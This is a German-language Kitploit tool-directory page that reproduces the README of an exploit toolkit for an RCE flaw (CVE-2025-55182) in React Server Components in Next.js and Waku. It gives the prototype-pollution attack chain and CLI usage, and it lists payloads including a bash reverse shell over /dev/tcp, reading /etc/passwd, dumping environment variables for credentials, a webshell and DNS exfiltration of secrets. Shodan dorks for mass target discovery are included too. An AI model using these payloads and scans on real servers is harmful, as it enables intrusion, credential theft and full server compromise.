Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
PoC-RCE-CVE-2025-55182 — Fortschrittliches RCE-Ausnutzungstoolkit für Schwachstellen in React Server Components. Bietet mehrere vorgefertigte Payloads, Shodan-Integration zur Zielermittlung und Massenscans für autorisierte Penetrationstests. | Kitploit
Tools/GitHubGitHub/ilixm/poc-rce-cve-2025-55182
AufklärungSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsCommand and ControlRed TeamingRemote-Access-Tool

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Payload-Entwicklung
GitHubilixm/poc-rce-cve-2025-55182

PoC-RCE-CVE-2025-55182

Fortschrittliches RCE-Ausnutzungstoolkit für Schwachstellen in React Server Components. Bietet mehrere vorgefertigte Payloads, Shodan-Integration zur Zielermittlung und Massenscans für autorisierte Penetrationstests.

Repository anzeigen
14vor 9 MonatenNoch nicht geprüft
Teilen

🔥 RSC RCE Exploit Toolkit

Version License Node Platform

Fortschrittliches Exploitation-Toolkit für Remote-Code-Ausführung-Schwachstellen in React Server Components

Nur für autorisierte Penetrationstests und Sicherheitsforschung

Funktionen • Installation • Nutzung • Shodan-Integration • Beispiele • Haftungsausschluss


📋 Inhaltsverzeichnis

  • Übersicht
  • Schwachstellendetails
  • Funktionen
  • Installation
  • Schnellstart
  • Nutzung
    • Grundlegende Exploitation
    • Verfügbare Payloads
    • Benutzerdefinierte Payloads
  • Shodan-Integration
  • Automatisiertes Scannen
  • Beispiele
  • Gegenmaßnahmen
  • Betroffene Versionen
  • Mitwirken
  • Haftungsausschluss
  • Lizenz

🎯 Übersicht

Dieses Toolkit nutzt eine kritische Remote Code Execution (RCE)-Schwachstelle in React Server Components (RSC)-Implementierungen aus, die insbesondere Folgendes angreift:

  • Next.js (Versionen 13.4.0 – 14.1.0)
  • Waku (anfällige Versionen)

Die Schwachstelle nutzt Prototype Pollution und unsicheres Deserialisieren im Datenhandhabungsmechanismus von RSC, um eine beliebige Codeausführung auf dem Server zu erreichen.

🔴 Schweregrad: KRITISCH

  • CVSS-Score: 9.8 (Kritisch)
  • Angriffsvektor: Netzwerk
  • Erforderliche Berechtigungen: Keine
  • Benutzerinteraktion: Keine
  • Auswirkung: Vollständige Serverkompromittierung

🔬 Schwachstellendetails

Technischer Hintergrund

React Server Components verwenden ein benutzerdefiniertes Serialisierungsformat, um Daten zwischen Client und Server zu übertragen. Die Schwachstelle besteht darin, wie diese Frameworks speziell präparierte Payloads deserialisieren und verarbeiten.

Angriffskette:

  1. Payload-Konstruktion: Erstellen einer bösartigen RSC-Payload mit zirkulären Referenzen
  2. Prototype Pollution: Missbrauch von $X:constructor:constructor zum Zugriff auf den Function-Konstruktor
  3. Code-Injektion: Einschleusen beliebigen JavaScript-Codes in das _prefix-Feld
  4. Ausführung: Der Server deserialisiert und führt die Payload aus

Exploitation-Ablauf

Attacker → Malicious RSC Payload → Target Server
                                         ↓
                              Unsafe Deserialization
                                         ↓
                              Prototype Chain Access
                                         ↓
                              Function Constructor
                                         ↓
                              ⚠️ RCE ACHIEVED ⚠️

✨ Funktionen

Kernfähigkeiten

  • ✅ Mehrere Framework-Unterstützung: Next.js und Waku
  • ✅ 8 vorgefertigte Payloads: Vom PoC bis zu vollständigen Reverse Shells
  • ✅ Benutzerdefinierte Codeausführung: Beliebiges JavaScript einschleusen
  • ✅ Shodan-Integration: Automatisierte Zielerkennung
  • ✅ Massenscanning: Mehrere Ziele automatisch testen
  • ✅ Professionelle CLI: Vollständige Kommandozeilenschnittstelle
  • ✅ Detaillierte Protokollierung: Farbcodierte Ausgabe mit Zeitstempeln
  • ✅ Fehlerbehandlung: Robustes Fehlermanagement

Vorgefertigte Payloads

PayloadBeschreibungAnwendungsfall
consoleBasis-PoC (console.log)Schwachstelle verifizieren
reverseShellBash-Reverse-ShellErster Zugriff
readFile/etc/passwd lesenDateisystemzugriff
envDumpUmgebungsvariablen ausgebenCredential-Extraktion
execCommandSystembefehle ausführenBeliebige Befehlsausführung
webshellExpress-Webshell bereitstellenDauerhafter Zugriff
exfilPackagepackage.json exfiltrierenAbhängigkeitsanalyse
dnsExfilDNS-Exfiltration (OOB)Blind-Exploitation

📦 Installation

Voraussetzungen

  • Node.js >= 16.0.0
  • npm oder yarn
  • Shodan CLI (optional, für automatisiertes Scannen)

Repository klonen

git clone https://github.com/yourusername/rsc-rce-exploit.git
cd rsc-rce-exploit

Abhängigkeiten installieren

npm install
# or
yarn install

Shodan einrichten (Optional)

# Install Shodan CLI
pip install shodan

# Initialize with your API key
shodan init YOUR_API_KEY

🚀 Schnellstart

1. Basis-Schwachstellenprüfung

node rsc-rce-exploit.js --target http://vulnerable-target.com --payload console

2. Reverse-Shell erhalten

# Start listener
nc -lvnp 4444

# Execute exploit
node rsc-rce-exploit.js \
  --target http://vulnerable-target.com \
  --payload reverseShell \
  --lhost 10.10.14.5 \
  --lport 4444

3. Benutzerdefinierten Befehl ausführen

node rsc-rce-exploit.js \
  --target http://vulnerable-target.com \
  --payload execCommand \
  --command "whoami"

📖 Nutzung

Grundlegende Exploitation

node rsc-rce-exploit.js [options]

Optionen

OptionBeschreibungErforderlich
--target <url>Ziel-URL✅
--framework <name>Framework: next oder waku❌ (Standard: next)
--payload <name>Payload-Name (siehe unten)✅*
--custom <code>Benutzerdefinierter JavaScript-Code✅*
--lhost <ip>Ihre IP (für Reverse-Shell)❌
--lport <port>Ihr Port (für Reverse-Shell)❌
--command <cmd>Auszuführender Befehl❌
--endpoint <path>Benutzerdefinierter RSC-Endpunkt (Waku)❌
--action-id <id>Benutzerdefinierte next-action-ID❌
--listVerfügbare Payloads auflisten❌
--verboseAusführliche Ausgabe❌
--helpHilfe anzeigen❌

*Entweder --payload oder --custom ist erforderlich

Verfügbare Payloads

Alle Payloads anzeigen:

node rsc-rce-exploit.js --list

Ausgabe:

📋 Available payloads:

  console              - Basic PoC - Console output
    Code: console.log(7*7+1)

  reverseShell         - Reverse shell (bash)
    Code: require('child_process').exec('bash -c "bash -i >& /dev/tcp/LHOST/LPORT 0>&1"')

  readFile             - Read /etc/passwd
    Code: console.log(require('fs').readFileSync('/etc/passwd','utf8'))

  envDump              - Dump environment variables
    Code: console.log(JSON.stringify(process.env,null,2))

  execCommand          - Execute system command
    Code: console.log(require('child_process').execSync('COMMAND').toString())

  webshell             - Write webshell to /tmp
    Code: require('fs').writeFileSync('/tmp/shell.js','...')

  exfilPackage         - Read package.json
    Code: console.log(require('fs').readFileSync('./package.json','utf8'))

  dnsExfil             - DNS exfiltration
    Code: require('dns').resolve4(Buffer.from(process.env.SECRET||'nosecret')...)

Benutzerdefinierte Payloads

Beliebigen JavaScript-Code ausführen:

node rsc-rce-exploit.js \
  --target http://target.com \
  --custom "require('fs').readdirSync('.').forEach(f=>console.log(f))"

🌐 Shodan-Integration

Shodan-Dorks

Next.js-Ziele

# Basic Next.js
http.component:"Next.js"

# Next.js with RSC
http.html:"__next" http.html:"RSC"

# Next.js dev mode (more vulnerable)
http.html:"__NEXT_DATA__" http.html:"development"
Tool herunterladen